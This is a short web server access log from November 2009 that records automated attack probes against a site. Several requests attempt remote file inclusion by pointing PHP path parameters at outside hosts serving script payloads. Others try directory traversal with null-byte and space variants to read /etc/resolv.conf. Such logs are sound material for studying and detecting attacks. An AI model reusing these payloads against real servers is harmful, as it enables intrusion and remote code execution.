87.106.218.11 - - [13/Nov/2009:02:35:50 -0500] "GET /logs/access_log.Q109102100//include/footer.php?_path[counter]=http://www.supliment.polirom.ro/brd/idv6.gif???? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
200.29.90.110 - - [13/Nov/2009:02:35:53 -0500] "GET /logs/access_log.Q109071100/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.29.90.110 - - [13/Nov/2009:02:35:53 -0500] "GET /logs/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
85.13.138.104 - - [13/Nov/2009:02:36:00 -0500] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 200 409 "-" "-"
85.13.138.104 - - [13/Nov/2009:02:36:00 -0500] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 200 409 "-" "-"
85.13.138.104 - - [13/Nov/2009:02:36:00 -0500] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 200 409 "-" "-"
85.13.138.104 - - [13/Nov/2009:02:36:05 -0500] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 200 409 "-" "-"
